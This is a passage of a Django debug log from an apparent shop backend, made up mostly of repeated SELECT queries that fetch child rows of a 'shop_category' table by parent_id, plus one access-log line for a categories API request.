"shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-30 21:01:33,466 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-30 21:01:33,468 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-30 21:01:33,470 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-30 21:01:33,474 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-30 21:01:33,476 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-30 21:01:33,478 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-30 21:01:33,480 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-30 21:01:33,482 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-30 21:01:33,486 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-30 21:01:33,488 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-30 21:01:33,490 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-30 21:01:33,492 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-30 21:01:33,495 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-30 21:01:33,497 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-30 21:01:33,500 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-30 21:01:33,502 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-30 21:01:33,504 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-30 21:01:33,506 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-30 21:01:33,508 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-30 21:01:33,512 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-30 21:01:33,514 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-30 21:01:33,516 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-30 21:01:33,518 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-30 21:01:33,520 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-30 21:01:33,524 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-30 21:01:33,526 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-30 21:01:33,528 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-30 21:01:33,530 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-30 21:01:33,532 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-30 21:01:33,535 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-30 21:01:33,537 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-30 21:01:33,540 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-30 21:01:33,542 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-30 21:01:33,544 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-30 21:01:33,547 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [30/Dec/2019 21:01:33] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-30 21:01:37,884 utils 2749 140297222735616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-30 21:01:37,891 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-30 21:01:37,895 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-30 21:01:37,898 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-30 21:01:37,901 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-30 21:01:37,904 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-30 21:01:37,906 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-30 21:01:37,908 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-30 21:01:37,911 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-30 21:01:37,916 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-30 21:01:37,919 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-30 21:01:37,922 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-30 21:01:37,925 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-30 21:01:37,928 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-30 21:01:37,932 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-30 21:01:37,935 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-30 21:01:37,937 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-30 21:01:37,940 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-30 21:01:37,942 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-30 21:01:37,946 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-30 21:01:37,950 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-30 21:01:37,953 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-30 21:01:37,957 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-30 21:01:37,960 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-30 21:01:37,963 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-30 21:01:37,969 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-30 21:01:37,972 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-30 21:01:37,975 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-30 21:01:37,979 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-30 21:01:37,982 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-30 21:01:37,987 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-30 21:01:37,991 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY 